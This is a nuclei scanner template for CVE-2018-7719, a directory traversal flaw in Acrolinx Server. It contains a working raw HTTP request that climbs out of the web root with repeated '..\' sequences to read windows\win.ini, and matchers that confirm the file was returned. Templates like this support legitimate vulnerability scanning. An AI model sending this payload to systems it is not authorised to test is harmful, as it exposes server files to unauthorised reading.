nuclei-templates/cves/2018/CVE-2018-7719.yaml

32 lines
865 B
YAML

id: CVE-2018-7719
info:
name: Acrolinx Server Directory Traversal
author: 0x_akoko
severity: high
description: Acrolinux Server versions prior to 5.2.5 suffer from a directory traversal vulnerability.
reference:
- https://packetstormsecurity.com/files/146911/Acrolinx-Server-Directory-Traversal.html
- https://www.cvedetails.com/cve/CVE-2018-7719
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7719
cwe-id: CWE-22
tags: cve,cve2018,acrolinx,lfi
requests:
- raw:
- |+
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
Host: {{Hostname}}
unsafe: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and